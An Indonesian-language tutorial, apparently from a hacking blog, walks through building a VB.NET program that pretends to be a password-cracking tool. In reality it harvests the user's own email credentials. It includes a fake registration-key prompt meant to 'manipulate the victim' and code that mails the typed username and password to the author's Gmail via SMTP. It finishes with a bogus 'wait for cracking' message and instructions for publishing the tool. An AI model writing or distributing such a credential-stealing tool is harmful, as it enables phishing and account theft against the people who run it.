ketiga
buat 2 command button
pada properties nya rubah text 1. Start 2. Exit
keempat
kasih checkbutton biar pengguna tool kalian percaya bahwa tool kalian ini Berfungsi
setelah itu klik 2x pada form
INGAT sebelum public class form1 masukkan type
Imports System.Net.Mail
Imports Microsoft.Win32
dan masukkan kode
MsgBox("Input Your serial number")
Dim LK As String = "0987654321"
Dim L As RegistryKey = Registry.CurrentUser.CreateSubKey("software\vaqxine", RegistryKeyPermissionCheck.Default)
If L.GetValue("licence") Is Nothing Then
Dim input As String = InputBox("Enter Your Registration Key", "Please Register Your Program!")
If input <> LK Then
MsgBox("Please Enter A Valid Registration Key!", MsgBoxStyle.Exclamation, "Invalid Registration Key")
End
Else
L.SetValue("licence", LK)
MsgBox("Click Ok to continue", MsgBoxStyle.Information, "Registration Key accepted")
End If
ElseIf L.GetValue("licence") <> LK Then
Dim input As String = InputBox("Enter your registration key", "Your current registration key is not valid")
If input <> LK Then
MsgBox("Please Enter A Valid License Key!", MsgBoxStyle.Exclamation, "Invalid Registration Key")
End
Else
L.SetValue("licence", LK)
MsgBox("Click Ok to continue", MsgBoxStyle.Information, "Registration key accepted")
End If
End If
L.Close()
fungsi code ini buat manipulasi korban dengan memasukkan serial number pada bagian Dim LK As Stringagar tool kalian lebih resmi :P
setelah itu kembali lagi ke form dan klik 2x start dan masukkan codingnya
Dim MyMailMessage As New MailMessage
MyMailMessage.From = New MailAddress("email gmail kalian")
MyMailMessage.To.Add("email gmail kalian")
MyMailMessage.Body = ("Username: " + TextBox1.Text & vbCrLf & "Password: " + TextBox2.Text & vbCrLf & vbCrLf & "Attempting To Hack: " + TextBox3.Text)
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential("email gmail kalian", "password gmail kalian")
SMTPServer.EnableSsl = True
SMTPServer.Send(MyMailMessage)
MsgBox("Wait for 2-3 hours to cracking the password Visit my blog www.trojanzboy.blogspot.com")
setelah itu test program dengan mengklik tombol start debugging (F5)
jika sukses test masukkan email dan password pada text box
maka email&&password terkirim di email kalian cek email kalian
dan saatnya mempublikasikan tool anda
klik build toolbar --> build solution &&& --> build windowsaplication
dan hasil outputnya ada di my document > visual studio > project
dan tool pun siap untuk diedarkan
NB : jika gmailnya kalian terdapat authentication mobile maka tool nya tidak dapat bekerja
